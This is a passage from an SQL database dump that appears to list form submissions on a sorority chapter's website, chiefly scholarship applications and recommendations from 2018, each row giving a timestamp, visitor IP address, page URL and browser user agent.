Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(151,8,NULL,'2018-03-08 17:44:48',0,0,'50.225.39.82','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(152,8,NULL,'2018-03-10 13:11:02',0,0,'100.36.84.244','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(153,8,NULL,'2018-03-12 11:32:32',0,0,'50.225.39.81','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(154,8,NULL,'2018-03-12 14:28:12',0,0,'50.225.39.78','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(155,6,NULL,'2018-03-13 12:06:13',0,0,'69.143.35.179','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (X11; CrOS x86_64 10176.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.190 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,1,NULL,'active',NULL),(156,6,NULL,'2018-03-13 12:07:17',0,0,'69.143.35.179','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (X11; CrOS x86_64 10176.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.190 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,1,NULL,'active',NULL),(157,6,NULL,'2018-03-13 12:08:58',0,0,'69.143.35.179','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (X11; CrOS x86_64 10176.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.190 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,1,NULL,'active',NULL),(158,8,NULL,'2018-03-13 18:24:52',0,0,'50.225.39.78','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(159,8,NULL,'2018-03-13 20:02:04',0,0,'174.205.3.22','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(160,8,NULL,'2018-03-13 21:41:38',0,0,'174.205.3.22','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(161,6,NULL,'2018-03-13 22:11:10',0,0,'100.16.228.140','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(162,6,NULL,'2018-03-13 23:22:58',0,0,'100.36.75.210','http://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(163,8,NULL,'2018-03-13 23:28:16',0,0,'100.36.75.210','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:58.0) Gecko/20100101 Firefox/58.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(164,6,NULL,'2018-03-14 02:59:44',0,0,'71.121.167.97','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(165,6,NULL,'2018-03-14 17:16:14',0,0,'50.225.39.35','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(166,8,NULL,'2018-03-14 18:04:02',0,0,'50.225.39.35','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(167,8,NULL,'2018-03-14 18:13:16',0,0,'50.225.39.87','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(168,8,NULL,'2018-03-14 18:20:05',0,0,'50.225.39.34','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(169,6,NULL,'2018-03-14 21:38:46',0,0,'173.64.123.159','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(170,8,NULL,'2018-03-15 13:43:02',0,0,'50.225.39.77','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(171,8,NULL,'2018-03-15 21:25:47',0,0,'71.127.147.218','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(172,8,NULL,'2018-03-16 15:15:50',0,0,'170.93.144.3','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(173,8,NULL,'2018-03-22 19:16:33',0,0,'73.163.227.238','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(174,8,NULL,'2018-03-23 12:29:15',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(175,8,NULL,'2018-03-23 12:30:35',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(176,8,NULL,'2018-03-23 22:15:48',0,0,'73.200.187.175','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(177,6,NULL,'2018-03-25 19:58:47',0,0,'100.15.146.12','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MATBJS; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(178,8,NULL,'2018-03-25 20:09:46',0,0,'100.15.146.12','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(179,8,NULL,'2018-03-26 12:13:52',0,0,'50.225.39.81','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(180,8,NULL,'2018-03-26 13:11:43',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(181,8,NULL,'2018-03-26 13:48:17',0,0,'50.225.39.80','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(182,6,NULL,'2018-03-26 15:41:28',0,0,'50.202.157.138','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(183,8,NULL,'2018-03-26 15:46:37',0,0,'50.202.157.138','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(184,8,NULL,'2018-03-26 15:49:52',0,0,'50.202.157.138','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(185,6,NULL,'2018-03-26 18:45:48',0,0,'50.225.39.82','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(186,6,NULL,'2018-03-26 19:03:17',0,0,'204.126.132.241','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; LCTE; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(187,8,NULL,'2018-03-26 23:30:36',0,0,'173.64.115.6','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(188,8,NULL,'2018-03-26 23:48:56',0,0,'173.69.167.162','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(189,6,NULL,'2018-03-27 00:36:15',0,0,'73.173.254.31','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(190,8,NULL,'2018-03-27 14:01:37',0,0,'50.225.39.82','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(191,8,NULL,'2018-03-27 15:25:25',0,0,'96.244.83.31','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(192,8,NULL,'2018-03-27 18:28:33',0,0,'50.225.39.92','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(193,8,NULL,'2018-03-28 14:46:45',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(194,8,NULL,'2018-03-28 14:48:09',0,0,'50.225.39.76','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(195,8,NULL,'2018-03-28 18:15:06',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(196,8,NULL,'2018-03-29 12:04:32',0,0,'71.179.165.166','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(197,8,NULL,'2018-03-29 13:50:29',0,0,'50.225.39.86','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(198,8,NULL,'2018-03-29 13:55:12',0,0,'73.200.184.66','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(199,8,NULL,'2018-03-29 16:49:20',0,0,'204.126.132.241','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(200,8,NULL,'2018-03-29 16:56:10',0,0,'96.91.250.74','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(201,8,NULL,'2018-03-29 18:52:03',0,0,'50.225.39.78','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(202,6,NULL,'2018-03-30 00:24:56',0,0,'73.129.22.251','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(203,8,NULL,'2018-03-30 02:52:08',0,0,'71.127.150.254','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:57.0) Gecko/20100101 Firefox/57.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(204,6,NULL,'2018-03-30 03:05:34',0,0,'71.127.150.254','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:57.0) Gecko/20100101 Firefox/57.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(205,8,NULL,'2018-03-30 11:02:45',0,0,'71.244.140.169','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:58.0) Gecko/20100101 Firefox/58.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(206,8,NULL,'2018-03-30 14:30:34',0,0,'71.244.251.220','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(207,6,NULL,'2018-03-30 18:13:55',0,0,'96.244.195.93','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(208,6,NULL,'2018-03-30 18:15:27',0,0,'96.244.195.93','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(209,6,NULL,'2018-03-31 00:16:05',0,0,'71.166.46.215','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(210,6,NULL,'2018-03-31 02:39:40',0,0,'71.179.18.125','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(211,8,NULL,'2018-03-31 03:42:02',0,0,'76.106.122.110','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(212,6,NULL,'2018-03-31 14:26:57',0,0,'73.173.97.121','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(213,6,NULL,'2018-03-31 14:57:42',0,0,'96.244.204.238','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(214,6,NULL,'2018-03-31 17:51:15',0,0,'73.172.63.178','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(215,6,NULL,'2018-03-31 17:52:29',0,0,'173.64.115.6','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(216,8,NULL,'2018-03-31 18:30:58',0,0,'67.167.115.51','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(217,8,NULL,'2018-03-31 22:34:25',0,0,'96.86.43.81','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(218,6,NULL,'2018-04-01 00:04:10',0,0,'73.200.184.133','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(219,6,NULL,'2018-04-01 01:52:34',0,0,'68.134.12.220','http://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(220,6,NULL,'2018-04-01 03:35:42',0,0,'96.244.229.165','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(221,6,NULL,'2018-04-01 04:16:48',0,0,'172.56.22.197','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-G950U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.0 Chrome/59.0.3071.125 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(222,8,NULL,'2018-04-02 12:27:07',0,0,'173.69.133.145','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(223,8,NULL,'2018-04-03 14:10:16',0,0,'173.69.177.13','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(224,8,NULL,'2018-04-05 11:59:41',0,0,'50.225.39.82','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(225,8,NULL,'2018-04-05 19:08:53',0,0,'50.225.39.75','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(226,7,NULL,'2018-06-28 18:30:59',0,0,'174.205.10.232','https://zphiblgz.org/service/youth/','Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(227,10,NULL,'2018-08-13 06:57:08',0,0,'69.143.127.21','https://zphiblgz.org/','Mozilla/5.0 (X11; CrOS x86_64 10575.58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,1,NULL,'active',NULL),(228,10,NULL,'2018-08-13 07:22:19',0,0,'69.143.127.21','https://zphiblgz.org/','Mozilla/5.0 (X11; CrOS x86_64 10575.58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,1,NULL,'active',NULL),(229,10,NULL,'2018-08-18 00:14:06',0,0,'69.255.155.151','https://zphiblgz.org/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(230,6,NULL,'2018-08-20 20:37:14',0,0,'100.16.219.34','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(231,8,NULL,'2018-08-20 20:39:50',0,0,'100.16.219.34','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(232,10,NULL,'2018-09-03 16:05:37',0,0,'174.59.0.239','https://zphiblgz.org/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(233,10,NULL,'2018-09-03 16:49:26',0,0,'174.59.0.239','https://zphiblgz.org/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(234,10,NULL,'2018-09-09 12:09:06',0,0,'73.128.239.131','https://zphiblgz.org/','Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(235,10,NULL,'2018-09-09 19:31:28',0,0,'73.128.106.83','https://zphiblgz.org/','Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(236,10,NULL,'2018-09-09 19:49:39',0,0,'73.128.106.83','https://zphiblgz.org/','Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(237,6,NULL,'2018-10-15 19:53:50',0,0,'204.126.132.241','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(238,8,NULL,'2018-10-15 20:13:58',0,0,'204.126.132.241','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(239,8,NULL,'2018-10-16 14:15:09',0,0,'204.126.132.241','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(240,10,NULL,'2018-11-02 00:48:11',0,0,'136.160.222.139','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(241,10,NULL,'2018-11-04 18:59:16',0,0,'174.205.27.15','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(242,10,NULL,'2018-11-16 